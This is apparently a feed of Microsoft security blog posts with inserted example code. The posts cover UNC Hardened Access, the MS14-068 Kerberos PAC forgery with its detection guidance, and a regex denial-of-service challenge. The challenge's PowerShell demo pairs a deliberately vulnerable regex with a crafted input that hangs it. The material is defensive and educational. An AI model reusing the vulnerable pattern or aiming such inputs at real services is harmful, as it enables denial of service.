
  • Group Policy is configured to apply a GPO to the laptop that runs the script located at \\\NETLOGON\logon.cmd each time a user logs on to the machine.


With the above configuration, when a user successfully logs onto the laptop and the laptop has any network access, Group Policy will attempt to run the script located at \\\NETLOGON\logon.cmd, but behind the scenes, MUP would only allow the script to be run if the file could be opened and transmitted securely:

  1. MUP receives a request to open the file at \\\NETLOGON\logon.cmd.

  2. MUP notices that the requested path matches \\*\NETLOGON and paths that match \\*\NETLOGON are configured to require both Mutual Authentication and Integrity. UNC Providers that do not support UNC Hardened Access or indicate that they do not support both Mutual Authentication and Integrity are skipped.

  3. The Distributed File Server Namespace (DFS-N) client detects that the requested UNC path is a domain DFS-N namespace and begins its process of rewriting the UNC path (all DFS-N requests will be subject to the same security property requirements identified by MUP in step 2):

    1. The DFS-N client uses the DC Locator service and/or DFS-N DC Referral requests (depending on the OS version) to identify the name of a DC on the domain (e.g.

    2. DFS rewrites the path using the selected DC (e.g. \\\NETLOGON\logon.cmd becomes \\\NETLOGON\logon.cmd). Since Mutual Authentication is required and the target is expected to be a DC, DFS utilizes a special Kerberos Service Principal Name (SPN) to verify that the name retrieved in the previous step is indeed the name of a DC (if the name is not a DC, Kerberos authentication would fail due to an unknown SPN).

    3. If there are additional DFS-N links in the specified UNC path, the DFS-N client continues iterating and replacing paths to DFS-N links with paths to available targets until it has a UNC path that does not have any remaining DFS-N links.

  4. The final UNC path is passed back to MUP to select a UNC Provider to handle the request. MUP selects the SMB UNC provider since DCs utilize SMB to share the NETLOGON and SYSVOL shares.

  5. The SMB UNC Provider establishes an authenticated session with the selected SMB Server (if an authenticated session is not already present). If the authenticated session is not mutually authenticated (e.g. authentication was performed utilizing the NTLM protocol), then the SMB UNC Provider fails the request to open logon.cmd, since the mutual authentication requirement identified in step 2 could not be met.

  6. The SMB UNC Provider enables SMB Signing on all requests related to logon.cmd since MUP informed SMB that integrity is required for this request. Any attempts to tamper with the SMB requests or responses would invalidate the signatures on the requests/responses, thus allowing the receiving end to detect the unauthorized modifications and fail the SMB requests.

In this scenario, the client-side requirement of end-to-end mutual authentication and integrity protects the laptop from running a logon script located on a malicious server via the following security checks:

  • The requirement for Mutual Authentication ensures that the connection is not redirected to an unexpected (and potentially malicious) SMB Server when SMB Client attempts to establish a connection to the requested UNC path.

  • The requirement for Integrity enables SMB Signing, even if the SMB Client does not require SMB Signing for all paths by default. This protects the system against on-the-wire tampering that can be used to change the contents of the logon.cmd script as it is transmitted between the selected DC and the laptop.

  • The combined requirements for both Mutual Authentication and Integrity ensure that the final rewritten path selected by the DFS-N Client matches a path allowed by the DFS-N namespace configuration, and that spoofing and/or tampering attacks cannot cause the DFS-N client to rewrite the requested UNC path to a UNC path hosted by an unexpected (and potentially malicious) server.

Without these client-side protections, ARP, DNS, DFS-N, or SMB requests sent via Group Policy over untrusted networks could potentially cause the Group Policy service to run the logon.cmd script from the wrong SMB Server.
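The two-purpose evaluation MUP performs (filter providers by supported properties, then pass the requirements to the chosen provider via the ECP) and the logon.cmd scenario above, as an added model in Python that is not Microsoft's code: the policy table, provider names, server names and session records are constructed for this example, and `fake_connect` stands in for a provider's real session setup.

```python
"""Model of how MUP applies UNC Hardened Access, following the MS15-011 post.

Added illustration, not Microsoft's code: the policy table, provider names,
server names and session records below are constructed for this example.
"""
from dataclasses import dataclass
from fnmatch import fnmatchcase

# The two security properties a hardened path can require.
MUTUAL_AUTH = "RequireMutualAuthentication"
INTEGRITY = "RequireIntegrity"

# Constructed GPO: wildcard UNC path -> required properties (as in the scenario).
HARDENED_PATHS = {
    r"\\*\NETLOGON": frozenset({MUTUAL_AUTH, INTEGRITY}),
    r"\\*\SYSVOL": frozenset({MUTUAL_AUTH, INTEGRITY}),
}


@dataclass(frozen=True)
class Provider:
    name: str
    supports: frozenset  # properties the provider opted in to (empty = no opt-in)


@dataclass(frozen=True)
class Session:
    """Outcome of a provider connecting to a server (constructed stand-in)."""
    mutual: bool    # Kerberos with a verified SPN -> True; NTLM -> False
    can_sign: bool  # server is able to negotiate SMB Signing


def split_unc(path):
    r"""Split \\server\share\rest into its parts; raise on non-UNC input."""
    if not path.startswith("\\\\"):
        raise ValueError("not a UNC path: %r" % path)
    parts = path[2:].split("\\", 2)
    if len(parts) < 2 or not parts[0] or not parts[1]:
        raise ValueError("UNC path needs a server and a share: %r" % path)
    return parts[0], parts[1], parts[2] if len(parts) == 3 else ""


def required_properties(path, policy=HARDENED_PATHS):
    """Evaluate the policy for one requested path (MUP does this on every create/open).

    Server and share match case-insensitively; '*' in the policy is a wildcard.
    """
    server, share, _ = split_unc(path)
    needed = set()
    for pattern, props in policy.items():
        pat_server, pat_share, _ = split_unc(pattern)
        if (fnmatchcase(server.lower(), pat_server.lower())
                and fnmatchcase(share.lower(), pat_share.lower())):
            needed |= props
    return needed


def select_provider(path, providers, policy=HARDENED_PATHS):
    """Purpose 1 from the post: skip providers lacking any required property."""
    needed = required_properties(path, policy)
    for provider in providers:  # providers are tried in installed order
        if needed <= provider.supports:
            return provider, needed
    return None, needed


def open_unc(path, providers, connect, policy=HARDENED_PATHS):
    """Purpose 2: the chosen provider must honour the properties passed in the ECP.

    `connect(provider, server)` stands in for the provider's session setup and
    returns a Session, or None if the server is unreachable.
    Returns (opened: bool, reason: str).
    """
    provider, needed = select_provider(path, providers, policy)
    if provider is None:
        return False, "no UNC provider supports %s" % sorted(needed)
    server, _, _ = split_unc(path)
    session = connect(provider, server)
    if session is None:
        return False, "%s could not connect to %s" % (provider.name, server)
    if MUTUAL_AUTH in needed and not session.mutual:
        # Step 5 of the scenario: an NTLM session cannot satisfy mutual authentication.
        return False, "mutual authentication required; session to %s is not mutual" % server
    if INTEGRITY in needed and not session.can_sign:
        # Step 6: integrity switches signing on; a server that cannot sign is rejected.
        return False, "integrity required; %s cannot negotiate SMB Signing" % server
    return True, "opened via %s (signed=%s)" % (provider.name, INTEGRITY in needed)


# Constructed environment: SMB opted in to both properties, a second provider did not.
PROVIDERS = [
    Provider("SMB", frozenset({MUTUAL_AUTH, INTEGRITY})),
    Provider("LegacyRedirector", frozenset()),
]
SERVERS = {
    "dc1.contoso.example": Session(mutual=True, can_sign=True),  # the real DC
    "kiosk-switch-box": Session(mutual=False, can_sign=True),    # answers with NTLM only
}


def fake_connect(provider, server):
    """Constructed stand-in for a provider establishing a session with `server`."""
    return SERVERS.get(server.lower())


if __name__ == "__main__":
    for p in (r"\\dc1.contoso.example\NETLOGON\logon.cmd",
              r"\\kiosk-switch-box\NETLOGON\logon.cmd",
              r"\\kiosk-switch-box\public\readme.txt"):
        print(p, "->", open_unc(p, PROVIDERS, fake_connect))
```

The third path is not covered by the policy, so the model opens it over the NTLM session without signing, which is the default SMB Client behaviour the post contrasts with the hardened NETLOGON and SYSVOL paths.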

How do I configure to protect myself/my users?

Once the update included as part of the bulletin MS15-011 is installed, follow the instructions at to ensure your systems are adequately protected. MS15-014 will install and provide protection without any additional configuration.

Please note that the Offline Files feature is not available on paths for which the UNC Hardened Access feature is enabled. 

A word on CVD and fixing difficult problems

In many regards, this security ‘fix’ is more accurately described as completely new functionality in Windows. Adding something of this scale posed a unique challenge to security response. Software vulnerabilities are typically more narrowly constrained in both investigation and remediation – and most response is structured to address that scope. Among the benefits of Coordinated Vulnerability Disclosure (CVD) is it provides for greater flexibility and deeper collaboration with researchers to take the necessary time and perspective to deliver the most complete security solutions to customers. In this case we tackled a vulnerability that required a much greater scope in engineering to deliver a solution.

Most vulnerabilities reported to the MSRC are bugs in a single component, which are investigated, understood, and fixed within industry accepted response times. Creating the new functionality of UNC Hardening, however, required an entirely new architecture which increased development time and necessitated extensive testing. Thanks to CVD, and the close collaboration with the passionate security researchers who reported the vulnerability, Microsoft had sufficient time to build the right fix for a complicated issue. If the security researchers were not willing to refrain from disclosure until our fix was ready, customers would have been put at risk.


Microsoft offers its appreciation to the CVD community and a special thanks to the reporters of the issue which has resulted in UNC Hardening: Jeff Schmidt of JAS Global Advisors, Dr. Arnoldo Muller-Molina of simMachines, The Internet Corporation for Assigned Names and Numbers (ICANN) and Luke Jennings from MWR Labs.


  • Geoffrey Antos (Windows), Brandon Caldwell (MSRC), Stephen Finnigan (MSRC), Swamy Gangadhara (MSRC)


New Version of BinScope Binary Analyzer, 20 Nov 2014 19:50:11 +0000 We are delighted to announce the availability of an updated version of the BinScope Binary Analyzer, Microsoft BinScope version 2014. BinScope is a tool used during the Security Development Lifecycle (SDL) verification phase. It is available as a free download from the Microsoft Download Center here.

BinScope was designed to help detect potential vulnerabilities that can be introduced into binary files. The checks it implements examine application binary files to identify coding and build practices that can potentially render the application vulnerable to attack or to being used as an exploit attack vector.

The specific changes in BinScope 2014 Update include:

  • Correctly handles CompilerWarningsCheck with the use of -W4 on the command line.
  • Correctly processes the warning levels which are explicitly enabled from the command line.
  • The __declspec(safebuffers) check no longer fires on GsDriverEntry for x86 drivers.
  • ATL version check now fails on known bad ATL headers only; no longer produces failures on unknown ATL headers.
  • Removed deprecated switches from showing as part of /?.
  • Allows new-line delimited file lists getting parsed as response files.

BinScope 2014 Update is inclusive of all the improvements that were part of BinScope 2014, such as:

Improved Diagnostic Messages

A key focus for BinScope 2014 was to ensure that diagnostic messages are clear and actionable for engineers when a potential vulnerability is detected. We believe that being able to quickly understand not only the potential issue but its mitigation is key.

New Minimum Compiler and Minimum Linker Version Switch

By default, BinScope 2014’s CompilerVersionCheck adheres to the compiler and linker versions defined in the SDL guidance. However, we recognize that compiler and linker versions will evolve over time, as a result two new command line switches were added. These switches, known as /MinimumCompilerVersion and /MinimumLinkerVersion, provide the ability to adjust the minimum linker and compiler versions that BinScope will detect when running the CompilerVersionCheck.

Increased Performance

Another important focus for us was to improve the performance of BinScope when executing a scan, particularly with large binaries. As a result, we have been able to improve the scanning performance of BinScope by up to 4 times.

Other changes in BinScope 2014 include:

  • Removal of the Graphical User Interface (GUI).
  • Removal of directory scanning, instead individual binary paths should be provided.
  • General bug fixes.

For more information and additional resources, visit:

Additional information about CVE-2014-6324, 18 Nov 2014 10:17:42 +0000

Today Microsoft released update MS14-068 to address CVE-2014-6324, a Windows Kerberos implementation elevation of privilege vulnerability that is being exploited in-the-wild in limited, targeted attacks. The goal of this blog post is to provide additional information about the vulnerability, update priority, and detection guidance for defenders. Microsoft recommends customers apply this update to their domain controllers as quickly as possible.

Vulnerability Details

CVE-2014-6324 allows remote elevation of privilege in domains running Windows domain controllers. An attacker with the credentials of any domain user can elevate their privileges to that of any other account on the domain (including domain administrator accounts).

The exploit found in-the-wild targeted a vulnerable code path in domain controllers running on Windows Server 2008R2 and below. Microsoft has determined that domain controllers running 2012 and above are vulnerable to a related attack, but it would be significantly more difficult to exploit. Non-domain controllers running all versions of Windows are receiving a “defense in depth” update but are not vulnerable to this issue.

Before talking about the specific vulnerability, it will be useful to have a basic understanding of how Kerberos works.


One point not illustrated in the diagram above is that both the TGT and Service Ticket contain a blob of data called the PAC (Privilege Attribute Certificate). A PAC contains (among other things):

  • The user’s domain SID
  • The security groups the user is a member of


When a user first requests a TGT from the KDC, the KDC puts a PAC (containing the user’s security information) into the TGT. The KDC signs the PAC so it cannot be tampered with. When the user requests a Service Ticket, they use their TGT to authenticate to the KDC. The KDC validates the signature of the PAC contained in the TGT and copies the PAC into the Service Ticket being created.

When the user authenticates to a service, the service validates the signature of the PAC and uses the data in the PAC to create a logon token for the user. As an example, if the PAC has a valid signature and indicates that “Sue” is a member of the “Domain Admins” security group, the logon token created for “Sue” will be a member of the “Domain Admins” group.

The update for CVE-2014-6324 fixes an issue in the way Windows Kerberos validates the PAC in Kerberos tickets. Prior to the update it was possible for an attacker to forge a PAC that the Kerberos KDC would incorrectly validate. This allows an attacker to remotely elevate their privilege against remote servers from an unprivileged authenticated user to a domain administrator.


Update Priority

  1. Domain controllers running Windows Server 2008R2 and below
  2. Domain controllers running Windows Server 2012 and higher
  3. All other systems running any version of Windows


Detection Guidance

Companies currently collecting event logs from their domain controllers may be able to detect signs of exploitation pre-update. Please note that this logging will only catch known exploits; there are known methods to write exploits that will bypass this logging.


The key piece of information to note in this log entry is that the “Security ID” and “Account Name” fields do not match even though they should. In the screenshot above, the user account “nonadmin” used this exploit to elevate privileges to “TESTLAB\Administrator”.

After installing the update, for Windows 2008R2 and above, the 4769 Kerberos Service Ticket Operation event log can be used to detect attackers attempting to exploit this vulnerability. This is a high volume event, so it is advisable to only log failures (this will significantly reduce the number of events generated).


After installing the update, exploitation attempts will result in the “Failure Code” of “0xf” being logged. Note that this error code can also be logged in other extremely rare circumstances. So, while there is a chance that this event log could be generated in non-malicious scenarios, there is a high probability that an exploitation attempt is the cause of the event.
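Both detection checks described above (the pre-update Security ID / Account Name mismatch and the post-update 4769 with Failure Code 0xf), as an added example that is not Microsoft's code: the events are constructed dictionaries using the field names the post quotes, the SID-to-account snapshot is made up, and the 4624 event ID and "Client Address" field are assumptions of this example, not taken from the post.

```python
"""Detection checks from the MS14-068 guidance, run over constructed sample events.

Added illustration, not Microsoft's code. The events are hand-built dicts
using the field names the post quotes ("Security ID", "Account Name",
"Failure Code"); the SIDs, names and event IDs other than 4769 are made up.
"""

# Constructed directory snapshot: SID -> account, as an analyst would export it.
ACCOUNT_BY_SID = {
    "S-1-5-21-1000-2000-3000-500": "TESTLAB\\Administrator",
    "S-1-5-21-1000-2000-3000-1105": "TESTLAB\\nonadmin",
}

KERBEROS_TGS_EVENT = 4769        # "Kerberos Service Ticket Operation"
KERB_FAILURE_CODE_AFTER_FIX = 0xF  # logged for exploitation attempts once the update is installed


def _same_account(a, b):
    """Compare account names case-insensitively, with or without a DOMAIN\\ prefix."""
    return a.rsplit("\\", 1)[-1].lower() == b.rsplit("\\", 1)[-1].lower()


def sid_name_mismatch(event, directory=ACCOUNT_BY_SID):
    """Pre-update indicator: the Security ID resolves to a different account than Account Name.

    This only catches the known exploit pattern the post describes; the post
    notes that other exploit variants can avoid leaving this trace.
    """
    sid, name = event.get("Security ID"), event.get("Account Name")
    if not sid or not name:
        return None
    resolved = directory.get(sid)
    if resolved is None:
        return None  # unknown SID: cannot judge, do not guess
    if _same_account(resolved, name):
        return None
    return "account %s logged on with the SID of %s" % (name, resolved)


def parse_failure_code(value):
    """Accept '0xf', '0xF', '0x0000000F' or a bare int; return None if unparsable."""
    if value is None:
        return None
    if isinstance(value, int):
        return value
    try:
        return int(str(value).strip(), 16)
    except ValueError:
        return None


def tgs_failure_after_fix(event):
    """Post-update indicator: event 4769 logged with Failure Code 0xf."""
    if event.get("EventID") != KERBEROS_TGS_EVENT:
        return None
    if parse_failure_code(event.get("Failure Code")) != KERB_FAILURE_CODE_AFTER_FIX:
        return None
    return "4769 failure 0xf for %s from %s" % (
        event.get("Account Name", "?"), event.get("Client Address", "?"))


def scan(events):
    """Run both checks over a sequence of events; return (index, reason) per hit."""
    hits = []
    for i, ev in enumerate(events):
        for check in (sid_name_mismatch, tgs_failure_after_fix):
            reason = check(ev)
            if reason:
                hits.append((i, reason))
    return hits


# Constructed sample: a normal logon, the elevation the post describes, then a
# post-update attempt (0xF) and an unrelated successful ticket request (0x0).
SAMPLE_EVENTS = [
    {"EventID": 4624, "Security ID": "S-1-5-21-1000-2000-3000-1105",
     "Account Name": "nonadmin"},
    {"EventID": 4624, "Security ID": "S-1-5-21-1000-2000-3000-500",
     "Account Name": "nonadmin"},
    {"EventID": 4769, "Account Name": "nonadmin@TESTLAB.LOCAL",
     "Client Address": "::ffff:10.0.0.23", "Failure Code": "0xF"},
    {"EventID": 4769, "Account Name": "svc-backup@TESTLAB.LOCAL",
     "Client Address": "::ffff:10.0.0.9", "Failure Code": "0x0"},
]


if __name__ == "__main__":
    for index, reason in scan(SAMPLE_EVENTS):
        print("event %d: %s" % (index, reason))
```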



The only way a domain compromise can be remediated with a high level of certainty is a complete rebuild of the domain. An attacker with administrative privilege on a domain controller can make a nearly unbounded number of changes to the system that can allow the attacker to persist their access long after the update has been installed. Therefore it is critical to install the update immediately.


Additional Notes

Azure Active Directory does not expose Kerberos over any external interface and is therefore not affected by this vulnerability.


Joe Bialek, MSRC Engineering

IoT Security Does Not Have to be an Oxymoron – Part 2, 10 Nov 2014 17:03:55 +0000 more »]]>As my colleague Kevin Sullivan wrote in part 1 of this two-part series, the Internet of Things (IoT) holds great promise for organizations and consumers. But like many new technologies, it brings with it a number of security and privacy challenges. The industry can work to help address many of these challenges by building on some of the lessons learned from decades of experience connecting traditional computing devices to the Internet, as well as understanding the unique challenges that the IoT presents.

Among those unique challenges is the diversity of devices encompassing the IoT, which range from very simple devices that only transmit data to complex devices with processors and sophisticated software. Before millions or billions of these devices are deployed across the world, some security and privacy fundamentals need to be carefully considered, including:

  • Insecure design: Some of the early IoT devices I have seen in the market today have not been designed with security in mind. Some of these devices lack basic security capabilities, while others have security capabilities, but they are inappropriate for all the scenarios that the device can be used in. It’s also easy to imagine that some IoT devices have been released with insecure default settings.
  • Disclosure of personal information: When devices, sensors, appliances, etc., are connected to the Internet (or are physically accessible), it can raise concerns that everyday activities, preferences, and sensitive information could be monitored and disclosed without proper authorization. Additional concerns arise with the possibility that data gathered from IoT devices could be correlated with other sources of data and used for purposes, such as the creation of self-learning autonomous systems, without the appropriate consent from the data owner.
  • Limited ability to receive updates and change configurations: Keeping systems up-to-date with security updates is one of the most effective security practices today. As vulnerabilities are discovered and attackers attempt to exploit them, it’s critically important that vendors have a well thought through response plan and the capability to update and reconfigure systems to mitigate these attacks. Not all IoT devices are going to be the same. Different devices are going to have different hardware and software, and subsequently different capabilities. Some devices might have limited update capabilities or might not even have an operating system. What’s the plan to update a sensor that doesn’t have a full operating system installed on it? This type of requirement needs careful consideration.
  • Insecure data: How IoT devices store and transmit data is another important consideration. Securing data communications, including authentication, and encrypting data at rest have become common expectations for systems today. The ability to manage settings for such security features is also a common expectation. Many IoT devices might be connected to networks that are themselves insecure, making how well these devices protect data in untrusted or hostile environments a consideration.

What should industry do to help address security and privacy related to IoT? Building software with security in mind during every phase of development has proven to be very effective, and the same discipline can inform the development process for IoT devices. Given the diversity of devices described above, broadly applicable design considerations should include:

  • Secure by design, secure in development and secure in deployment (SD3): This is the same mantra we started in Trustworthy Computing at Microsoft many years ago. IoT devices and services should be designed and developed in a manner that improves security and privacy during the lifecycle of the device by applying secure software development processes such as Microsoft’s Security Development Lifecycle.
  • Secure communications: Presumably, in the future many IoT devices will operate on the public Internet or on other networks where they may face a variety of threats to data confidentiality. IoT devices and services should utilize strong encryption techniques to protect data, and networks should use the latest communication protocols and up-to-date security architecture. On IoT devices that host third-party applications, the security of these communications needs to be addressed as well. Some more primitive IoT devices will lack the ability to perform encryption themselves. In such cases, one possible solution would be to design the device to allow its data to be encrypted by an intermediary gateway device on the local network before the data is sent over the Internet.
  • Manageability and security updates: Many IoT devices will likely be built for single purpose applications and will have limited input/output capabilities to manage the device. IoT devices need to be designed to apply important functionality and security updates, preferably with the option of automatic updates requiring little or no administrator interaction. Devices should be designed to respond to security issues impacting devices, services, or applications. Awareness of the security or privacy issues related to other services and devices with dependencies should also be accounted for in update planning. As one possible solution, IoT devices lacking the physical capacity for manageability and updates should be designed to allow security management by an intermediary gateway device on the local network, in the same way such a gateway can encrypt their data before it is sent over the Internet.
  • Privacy and data use: Because of the potential volume of personal or proprietary data that can be produced and stored by the IoT, both consumers and businesses will insist that the privacy of their information be protected. IoT products should take privacy-impacting collection and use of data into consideration from the earliest stages of design through development and deployment. IoT devices and services that seek to collect data pertaining to people should undergo appropriate scrutiny and evaluation for privacy concerns. Companies should also consider how they manage the commercial sharing of data as the IoT becomes a platform for trading information.
  • Appropriate level of cloud service capacity: Cloud services will need to be designed for a significantly higher number of simultaneous connections and greater volumes of data traffic given the expected proliferation of IoT devices. If cloud services are unable to manage the expected data flows generated by the IoT, they could be overwhelmed.

What should consumers do to protect their security and privacy related to IoT?

  • Evaluate security and privacy at purchase: Understand what security and privacy controls the device and services provide.
  • With updatable devices, keep software/firmware for your devices up-to-date: If the device offers automatic updates, consumers should enable them. Otherwise, consumers should check the manufacturer’s website regularly for new security updates.
  • Stay informed: Be aware and learn more about IoT devices and services.

You can learn more about Microsoft’s Internet of Things strategy here.

Trust me, I’m a cloud vendor, 14 Oct 2014 17:42:26 +0000

I visited my sister and her family a while ago and somehow ended up playing a game with my seven year-old niece. I forget what it was called now, but the objective was to describe colors without being able to relate them to an object. In other words, describe the color blue without referring to the sea, or the sky.

Try it. It’s tough. Though apparently not for seven year-olds.

Don’t ask me how, because I really don’t know, but on the drive home the game got me thinking about the concept of trust and how it relates to the cloud and cloud services. Just how do you explain something as ethereal as trust and yet come across as genuine and well, trustworthy?

In today’s environment, winning and retaining their customers’ trust is every cloud provider’s ambition. But how do you earn the right to be trusted? What do you say? Somehow starting a conversation with the words ‘trust me’ seems to have the opposite effect.

Here’s another phrase: actions speak louder than words. And that is what we have tried to do at Microsoft – set out the things we do to make our cloud services more secure, private and reliable. With 200 online and cloud services serving a billion customers and 20 million businesses in more than 76 countries/regions we know that organizations won’t use technology they don’t trust.


Security and privacy have been ingrained into our culture for more than a decade. It’s part of our DNA. To help our customers decide whether they can trust our cloud we invite them to consider our efforts in four main categories: cybersecurity, data privacy, compliance and transparency.

There’s a lot to cover in each of these categories, but, as I learned playing the colour game with my niece, there’s a benefit in brevity. Over the next few weeks I’ll cover each of these in a bit more detail, starting with cybersecurity.


Cybersecurity is engineered into Microsoft products and services from the initial design stage using the Security Development Lifecycle (SDL) – a holistic and comprehensive software development process for writing more secure and privacy-enhanced code, and enabling more reliable products and services. We invented the SDL and today it is broadly regarded as the industry standard for writing more secure software. Many of its key elements have been adopted by organizations including the Government of India as well as commercial entities, including Itron, MidAmerican Energy, Adobe and Cisco as the basis for their secure development regimen. Our SDL was also recognized as a case study on how to do software security development in the ISO standard 27034-1.

To help protect against Internet-based security threats and continuously assess and enhance the security of our services, we utilize Operational Security Assurance (OSA). OSA combines the knowledge from our security development and security response programs, with the experience of running hundreds of thousands of servers in data centers around the world. This depth of experience helps make Microsoft cloud-based services’ infrastructure more resilient to attack by decreasing the amount of time needed to prevent, detect, and respond to real and potential Internet-based security threats, thereby increasing the security for our customers.

For many years, we have incorporated encryption into our products and services to help protect customers from online criminals and hackers. However, since June of 2013, public concern about the methods governments use to collect data has led many organizations to be concerned about the privacy of their information. We not only understand the concerns our customers have, we share them. While we have no direct evidence that customer data has been breached by unlawful and unauthorized government access, we are addressing this concern head on by pursuing a comprehensive engineering effort to strengthen the encryption of customer data across our networks and services.

Although this is a significant engineering effort given the large number of services we offer and the hundreds of millions of customers we serve, we are committed to moving quickly. Many services already benefit from strong encryption in all or part of the lifecycle. For example, is protected by best in class security such as Transport Layer Security (TLS) and Perfect Forward Secrecy (PFS) encryption for both outbound and inbound email. We are also expanding encryption across all our services to provide best in class encryption solutions for data in transit between a user and the service, data in transit between data centers, data at rest, and end-to-end communications between users. And for customers looking for another layer of protection, we have also invested in giving customers the ability to use their own encryption mechanisms to encrypt their data.

Please look in on the Cyber Trust Blog next week when I’ll talk further about what we are doing specifically in the area of data privacy.

Oh. You’re this color when you’re sad and yet when you look up on a sunny day it makes you happy. That’s how a seven year old girl explains blue.


Trust: what’s it all about?, 09 Oct 2014 18:52:15 +0000

Today I delivered a keynote about trust in the cloud at the Cybersecurity Expo 2014 event in London. I’ve been thinking about how to tackle a topic like ‘trust’ and how it applies to cloud computing. I don’t know about you, but when someone you don’t know very well says ‘you can trust me,’ I kind of feel the opposite. I believe that actions speak louder than words.

With that in mind, I approached the topic by talking about four key areas that Microsoft believes are important for cloud service providers to demonstrate trustworthiness; areas that Microsoft delivers in the 200+ cloud services customers use today. As I did with the delegates today, I invite readers to consider cloud provider efforts in four main categories: cybersecurity, data privacy, compliance and transparency.

For Cybersecurity, Microsoft works to protect, detect and respond to threats against customers. We have invested in developing more secure products and services for more than a decade via the Security Development Lifecycle (SDL) – a holistic and comprehensive software development process that we created to help write more secure and privacy-enhanced code and enable more reliable products and services. Today the SDL is regarded as the industry standard for writing more secure software and is included as a case study in the ISO standard 27034-1.

Our online services adhere to a rigorous set of security and privacy controls that govern operations and support through a process called Operational Security Assurance (OSA). We have strong data encryption polices that help to protect our customers, partners and internal data within our networks. In support of this, in July we provided examples of how we are expanding encryption across our services to help protect customer data:

  • Office 365 – Provides message encryption, an email service that allows you to send encrypted mail to anyone.
  • Microsoft Azure – ExpressRoute, enables customers to access Azure services from their premises without having to traverse the Internet.
  • – Protection is provided by Transport Layer Security (TLS) encryption for both outbound and inbound email. has also enabled Perfect Forward Secrecy (PFS) encryption support for sending and receiving mail.
  • OneDrive has enabled Perfect Forward Secrecy (PFS) encryption.

Microsoft has a global, 24×7 incident response team that works to mitigate the effects of cyberattacks and malicious activity. The incident response team follows established procedures for incident management, communication, and recovery, and uses discoverable and predictable interfaces internally and to customers. We also proactively partner with law enforcement to combat cybercrime through our Digital Crimes Unit.

Our commitment to data privacy begins at the development stage and is part of the SDL as well as a set of internal guidelines, called the Microsoft Privacy Standard. As a result, our enterprise cloud services include world-class privacy features like Data Loss Prevention (DLP), Rights Management Services (RMS), and various controls that help customers manage risks to their data. As a result, we are currently the only cloud vendor whose commercial contracts meet the European Union Data Protection Authorities’ stringent standards for international transfers of data, a fact recognized by the “Article 29 Working Party”.

Third-party certifications help demonstrate compliance readiness to customers, auditors and regulators. Independent third-party companies, such as Deloitte and the British Standards Institution (BSI), regularly assess and verify our capabilities and adherence to a comprehensive set of requirements. Our structured approach to compliance is built on commitment to comply with a broad range of certifications, in many cases setting the pace for others to follow.

In March 2013, as part of our commitment to increased transparency, we began publishing details on the number of demands we receive each year in our Law Enforcement Requests Report and providing clear documentation of our established practices in responding to government legal demands for customer data.

It is important to recognize that the threat landscape will continue to evolve to keep pace with advances in security and data protection – that’s a given. Microsoft remains committed to protecting customer data through innovation and collaboration to help manage risk from cybercriminals.

For more information on our cloud services, check out

Vuln Hunt: Find the Security Vulnerability Challenge #2, 09 Oct 2014 16:27:43 +0000

Ex-Netscape engineer Jamie Zawinski has a great quote about regular expressions. He said: “Some people, when confronted with a problem, think ‘I know, I’ll use regular expressions.’ Now they have two problems.” That’s certainly true for this week’s Security Vuln Hunt. Two points are possible, plus an extra bonus point. The question:


The programmer here has written an input validation regex to test whether a given string matches the format of a URL, and while we should give him credit for designing his application to validate input, the particular regex pattern that he’s using is vulnerable to a denial of service attack.

The subexpression (\.[a-zA-Z0-9\-\._]+){2,} in the pattern contains a grouping expression with repetition, (\.[a-zA-Z0-9\-\._]+), that is itself repeated via the quantifier {2,}. Because the character class inside the group also accepts “.”, a dot in the input can be consumed either by the inner repetition or as the start of the next group, so the engine has exponentially many ways to split the input before it concludes there is no match. The worst-case running time for such a regex construction is exponential, O(2^n), and this could allow an attacker to craft a relatively short input value that would hang the application in an exponential processing loop.

Give yourself a point if you found the regular expression denial-of-service (ReDoS) vulnerability in the code.

Give yourself a point if you used the SDL Regex Fuzzer ( to find the vulnerability. These types of vulnerabilities are extremely difficult to find through manual code inspection, so why not take advantage of free tools that are available to help you?

Finally, give yourself a bonus point if you realized that in .NET 4.5, you can limit the amount of time that Regex spends trying to find matches by setting a matchTimeout value in the Regex constructor. This is an excellent defense-in-depth measure against ReDoS attacks.
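The matchTimeout defence from the bonus point, exercised from PowerShell against the post’s subexpression, as an added example that is not the challenge’s code. The pattern wrapper around the subexpression, the function names and the test inputs are my assumptions; the rewrite that removes “.” from the inner class is one way to take the ambiguity out of the pattern and is also mine.

```powershell
# Assumed wrapper around the post's subexpression (the post shows only the subexpression).
# The inner class still contains '.', which is the ambiguity that causes catastrophic backtracking.
$ambiguous   = '^[a-zA-Z0-9\-_]+(\.[a-zA-Z0-9\-\._]+){2,}$'
# Rewrite: drop '.' from the inner class so every '.' can only start a new group.
# Note it also rejects inputs such as "a..b" and "a.b.", which the original pattern accepted.
$unambiguous = '^[a-zA-Z0-9\-_]+(\.[a-zA-Z0-9\-_]+){2,}$'

function Test-UrlLike {
    # Match $Text against $Pattern under a .NET 4.5+ match timeout. Returns 'match',
    # 'nomatch' or 'timeout'; callers should treat 'timeout' as a rejected input.
    param([string]$Text, [string]$Pattern, [int]$TimeoutMs = 200)
    $opts = [System.Text.RegularExpressions.RegexOptions]::None
    $re = New-Object System.Text.RegularExpressions.Regex -ArgumentList $Pattern, $opts,
        ([TimeSpan]::FromMilliseconds($TimeoutMs))
    try {
        if ($re.IsMatch($Text)) { 'match' } else { 'nomatch' }
    } catch [System.Text.RegularExpressions.RegexMatchTimeoutException] {
        'timeout'
    }
}

# Constructed inputs: a benign host name, and a string that cannot match because the
# trailing '!' defeats '$', which forces the engine to try every split of the 28 dots.
$benign  = 'www.example.com'
$hostile = 'a' + ('.a' * 28) + '!'

foreach ($t in @($benign, $hostile)) {
    $label = if ($t.Length -gt 12) { $t.Substring(0, 12) + '...' } else { $t }
    "$label  ambiguous=$(Test-UrlLike $t $ambiguous)  unambiguous=$(Test-UrlLike $t $unambiguous)"
}
```

The ambiguous pattern hits the timeout on the hostile string while the unambiguous one rejects it immediately; both accept the benign name. The timeout is the measure to ship regardless, since it bounds the cost of any pattern you have not yet audited.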

Next week, we’ll look at a sneaky SQL Injection vulnerability.

BlueHat v14 is almost here, 06 Oct 2014 18:01:00 +0000

It’s that time of year and BlueHat v14 is almost upon us. As always, BlueHat is an opportunity for us to bring the brightest minds in security together, both internal and external, to discuss and tackle some of the hardest problems facing the industry today. Through this conference, our engineering teams get deep technical information and education on the latest threats from proven industry experts.

BlueHat kicks off on October 9th where we will spend the day focusing on researcher methodologies such as fuzzing, red team assessments, malware analysis and BIOS attacks. On the second day, we will have three tracks starting with Security & Identity, followed by State of the Hack (focusing on next generation of advanced persistent threats and web exploit detection) and then finally, we will end with Security in Deployed Environments.

